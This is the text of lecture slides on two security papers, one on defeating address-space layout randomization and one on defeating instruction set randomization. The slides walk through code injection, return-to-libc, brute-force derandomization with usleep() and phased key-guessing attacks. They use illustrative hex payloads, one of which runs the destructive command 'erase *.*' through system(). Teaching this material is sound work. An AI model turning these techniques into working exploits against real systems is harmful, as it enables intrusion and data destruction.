On The Effectiveness of Address-Space Randomization H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh Stanford University CCS 2004
Code-Injection Attacks Inject malicious executable code (payload) into victim process e.g., via attacker-supplied input Convince victim process to execute payload e.g., leverage buffer overrun to overwrite return address Attacker acquires complete control of process and all its privileges
Code-injection Example 8D 45 B8 50 FF 15 BC 82 2F 01 65 72 61 73 65 20 2A 2E 2A 20 61 (x24) 61 61 61 61 30 FB 1F 00 lea eax,[ebp-48h] push eax call <system>.data erase.data *.*.data a.data buf (64 bytes) void main(int argc, char *argv[]) return; } saved EBP (4 bytes) saved EIP (4 bytes) argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Code-injection Example 8D 45 B8 50 FF 15 BC 82 2F 01 65 72 61 73 65 20 2A 2E 2A 20 61 (x24) 61 61 61 61 30 FB 1F 00 lea eax,[ebp-48h] push eax call <system>.data erase.data *.*.data a.data lea eax,[ebp-48h] push eax call <system> void main(int argc, char *argv[]) return; } erase *.* argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Code-injection Example 8D 45 B8 50 FF 15 BC 82 2F 01 65 72 61 73 65 20 2A 2E 2A 20 61 (x24) 61 61 61 61 30 FB 1F 00 lea eax,[ebp-48h] push eax call <system>.data erase.data *.*.data a.data lea eax,[ebp-48h] push eax call <system> void main(int argc, char *argv[]) return; } erase *.* argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Code-injection Example 8D 45 B8 50 FF 15 BC 82 2F 01 65 72 61 73 65 20 2A 2E 2A 20 61 (x24) 61 61 61 61 30 FB 1F 00 lea eax,[ebp-48h] push eax call <system>.data erase.data *.*.data a.data lea eax,[ebp-48h] push eax call <system> void main(int argc, char *argv[]) return; } erase *.* argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Code-injection Example 8D 45 B8 50 FF 15 BC 82 2F 01 65 72 61 73 65 20 2A 2E 2A 20 61 (x24) 61 61 61 61 30 FB 1F 00 lea eax,[ebp-48h] push eax call <system>.data erase.data *.*.data a.data lea eax,[ebp-48h] push eax call <system> void main(int argc, char *argv[]) return; } erase *.* argv (4 bytes) <addr of erase *.* > bottom of stack (higher addresses)
Code-injection Example 8D 45 B8 50 FF 15 BC 82 2F 01 65 72 61 73 65 20 2A 2E 2A 20 61 (x24) 61 61 61 61 30 FB 1F 00 lea eax,[ebp-48h] push eax call <system>.data erase.data *.*.data a.data lea eax,[ebp-48h] push eax call <system> void main(int argc, char *argv[]) return; } erase *.* argv (4 bytes) <addr of erase *.* > bottom of stack (higher addresses)
Defense: W X Pages Data Execution Prevention (DEP) disallow writable & executable pages stack writable but non-executable by default now default on most Windows & Linux systems Counter-attack don t insert any code onto the stack jump directly to existing code (typically libc) called jump-to-libc attack
Return-to-libc Example 65 72 61 73 65 20 2A 2E 2A 20 61 (x58) BC 82 2F 01 61 (x8) 30 FB 1F 00.data erase.data *.*.data.data <system>.data.data <buf> buf (64 bytes) void main(int argc, char *argv[]) return; } saved EBP (4 bytes) saved EIP (4 bytes) argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Return-to-libc Example 65 72 61 73 65 20 2A 2E 2A 20 61 (x58) BC 82 2F 01 61 (x8) 30 FB 1F 00.data erase.data *.*.data.data <system>.data.data <buf> erase *.* aaa void main(int argc, char *argv[]) return; } addr of <system> addr of <buf>
Return-to-libc Example 65 72 61 73 65 20 2A 2E 2A 20 61 (x58) BC 82 2F 01 61 (x8) 30 FB 1F 00.data erase.data *.*.data.data <system>.data.data <buf> erase *.* aaa void main(int argc, char *argv[]) return; } addr of <system> addr of <buf>
Return-to-libc Example 65 72 61 73 65 20 2A 2E 2A 20 61 (x58) BC 82 2F 01 61 (x8) 30 FB 1F 00.data erase.data *.*.data.data <system>.data.data <buf> erase *.* aaa void main(int argc, char *argv[]) return; } addr of <system> addr of <buf>
Return-to-libc Example 65 72 61 73 65 20 2A 2E 2A 20 61 (x58) BC 82 2F 01 61 (x8) 30 FB 1F 00.data erase.data *.*.data.data <system>.data.data <buf> erase *.* aaa libc::system(char *cmd) <passes cmd to the shell!> } addr of <system> addr of <buf>
Defense: ASLR To return-to-libc, attacker must know where system() is located in libc possibly know where stack is located (to pass args) Idea: Randomize location of libc at load time Address Space Layout Randomization (ASLR) To support dynamic linking, libraries must be relocatable contain relocations which identify all code pointers linker choose lib location, remaps code pointers Adjust linker to choose library base addresses pseudorandomly Hard for attacker to predict binary feature locations or so we thought
Weaknesses of ASLR Once attacker finds one feature in libc, he knows locations of ALL features in libc. Not all 32 bits on a 32-bit system are available very high and very low addresses not available ultimately, only 16 bits remain Re-randomization not possible with shared address spaces most servers have parent dispatcher process and children responder processes child may crash, but parent continues Stack location is revealed by existing stack pointers lots of them floating around (e.g., frame pointers)
Derandomization Attack Phase 1: Find location of usleep() Repeatedly smash stack with guessed entrypoint of usleep() Arg n is an integer not a pointer, so does not require attacker knowledge of stack location Failed probe: Crash (connection immediately drops) Successful probe: Pause (connection pauses for n seconds, then drops) Requires 2^16/2=2^15 probes on average How long do you think would this take on average?
Derandomization Attack Phase 1: Find location of usleep() Repeatedly smash stack with guessed entrypoint of usleep() Arg n is an integer not a pointer, so does not require attacker knowledge of stack location Failed probe: Crash (connection immediately drops) Successful probe: Pause (connection pauses for n seconds, then drops) Requires 2^16/2=2^15 probes on average Average time for attack: 216 seconds
Derandomization Attack Phase 2: Inject the shell code Have location of system(), but not stack location need it to inject a pointer to an injected string arg Idea: Instead of injecting a pointer to buf directly, compute its location from the stack pointer ret instruction increases stack pointer by 4 How to execute a ret without injecting code onto stack? Answer: Just find the address of a ret in libc! Inject that address onto the stack many times to increase stack pointer until it reaches buf.
Derandomization Attack buf (64 bytes) erase *.* saved EBP (4 bytes) saved EIP (4 bytes) other args & local vars pointer to buf bottom of stack (higher addresses) smashed (unused EBP) address of ret address of ret address of system unused retaddr for system call pointer to buf bottom of stack (higher addresses)
Where s the FEEB? The Effectiveness of Instruction Set Randomization Ana Nora Sovarel, David Evans, Nathanael Paul University of Virginia USENIX 2005
Instruction Set Randomization Idea: Randomize the opcode encodings Secure CPU has privileged 8-bit KEY register CPU xor s each fetched instruction byte with KEY before interpreting (decrypting it) OS xor s entire program text with KEY at load-time (encrypting it in memory) Better implementation: Key is a length-n byte sequence CPU xor s code at address i with KEY[i mod n]
Code-injection Example 8D 45 B8 50 FF 15 BC 82 2F 01 65 72 61 73 65 20 2A 2E 2A 20 61 (x24) 61 61 61 61 30 FB 1F 00 <random instructions> <random instructions> <random instructions>.data erase.data *.*.data a.data <random instructions> <random instructions> <random instructions> int main(int argc, char *argv[]) return 0; } erase *.* argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Attacking ISR Goal: Discover the KEY (or at least some of it) Four-phase attack: Phase 1: discover 1 or 2 bytes of the KEY Phase 2: discover 4 bytes of the KEY Phase 3: discover 100 bytes of the KEY Phase 4: inject full-sized malicious payloads
Phase 1: Return-attack XX 61 (x63) 61 61 61 61 30 FB 1F 10 61 (x8) 03 14 DF 01 ret?.data a.data.data <original return addr> buf (64 bytes) int main(int argc, char *argv[]) return 0; } saved EBP (4 bytes) saved EIP (4 bytes) argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Phase 1: Return-attack XX 61 (x63) 61 61 61 61 30 FB 1F 10 61 (x8) 03 14 DF 01 ret?.data a.data.data <original return addr> ret? aaa int main(int argc, char *argv[]) return 0; } <original return addr>
Phase 1: Return-attack XX 61 (x63) 61 61 61 61 30 FB 1F 10 61 (x8) 03 14 DF 01 ret?.data a.data.data <original return addr> ret? aaa int main(int argc, char *argv[]) return 0; } <original return addr>
Phase 1: Return-attack XX 61 (x63) 61 61 61 61 30 FB 1F 10 61 (x8) 03 14 DF 01 ret?.data a.data.data <original return addr> ret? aaa int main(int argc, char *argv[]) return 0; } <original return addr>
Phase 1: Return-attack XX 61 (x63) 61 61 61 61 30 FB 1F 10 61 (x8) 03 14 DF 01 ret?.data a.data.data <original return addr> ret? aaa int main(int argc, char *argv[]) return 0; } <original return addr>
Phase 1: Jump-attack XX XX 61 (x62) 61 61 61 61 30 FB 1F 10 loop: jump loop?.data a.data buf (64 bytes) int main(int argc, char *argv[]) return 0; } saved EBP (4 bytes) saved EIP (4 bytes) argv (4 bytes) argc (4 bytes) bottom of stack (higher addresses)
Phase 1: Jump-attack XX XX 61 (x62) 61 61 61 61 30 FB 1F 10 loop: jump loop?.data a.data loop: jump loop? aa int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phase 1: Jump-attack XX XX 61 (x62) 61 61 61 61 30 FB 1F 10 loop: jump loop?.data a.data loop: jump loop? aa int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phase 1: Jump-attack XX XX 61 (x62) 61 61 61 61 30 FB 1F 10 loop: jump loop?.data a.data loop: jump loop? aa int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phase 2: Jump-attack 90 90 XX XX 61 (x60) 61 61 61 61 30 FB 1F 10 nop nop loop: jump loop?.data a.data nop nop loop: jump loop? int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phase 3: Jump-attack EB 03 14 DF XX 61 (x59) 61 61 61 61 30 FB 1F 10 jump <original ret addr?>.data a.data jump <original ret addr?> aaa int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phase 3: Jump-attack EB 03 14 DF XX 61 (x59) 61 61 61 61 30 FB 1F 10 jump <original ret addr?>.data a.data jump <original ret addr?> aaa int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phase 3: Jump-attack EB 03 14 DF XX 61 (x59) 61 61 61 61 30 FB 1F 10 jump <original ret addr?>.data a.data jump <original ret addr?> aaa int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phase 3: Jump-attack 90 EB 03 14 DF XX 61 (x58) 61 61 61 61 30 FB 1F 10 nop jump <original ret addr?>.data a.data nop jump <original ret addr?> aa int main(int argc, char *argv[]) argv (4 bytes) return 0; argc (4 bytes) } bottom of stack (higher addresses)
Phases 4: Full-size Payloads Learn ~100 bytes of KEY using Phases 1-3 Goal: Construct a payload such that execution of payload never steps IP outside the 100- byte window of known KEY s payload can be much larger than 100 bytes Solution: inject a virtual machine! main engine of VM confined to 100-byte window VM copies small chunks of payload into window copying process encrypts using known KEY bytes chunk returns back to main engine when next chunk required
Phase 4: MicroVM known KEY masks start: read_more_worm: save worm address in ebp move stack frame pointer WormIP = 0 copy (and encrypt) worm code update WormIP save VM registers load worm registers 22-byte worm execution buffer save worm registers load VM registers jmp read_more_worm worm code other worm data
Technical Issues False positives probabilistic analysis and mitigation strategies (see Section 3 of paper) Payloads that contain null bytes compute them dynamically (e.g., xor eax,eax instead of mov eax,0x00000000 ) ISR s that re-randomize after crashes only an issue when children crash parent process questionable ISR design choice no easy workaround suggested, though
Experimental Results Jump-attack cracked 100-byte key in ~6 min. average success rate: 95-100% ~9 infinite loops on average
Improving ISR Larger instruction encodings RISC: all instructions 32-bits long Better encryption AES instead of XOR (too expensive to be practical) Non-uniform remapping of instructions introduce P[255], a random permutation of 0..255 to decrypt byte b at address i, compute (P[b] xor KEY[i]) encryption uses inverse P table Why does this defeat the attack?
References Shacham, Page, Pfaff, Goh, Modagugu, and Boneh. On the Effectiveness of Address-Space Randomization. Proc. 11 th ACM Conf. on Comp. and Comm. Security, 2004. Sovarel, Evans, and Paul. Where s the FEEB? The Effectiveness of Instruction Set Randomization. Proc. 14 th USENIX Security Symposium, 2005.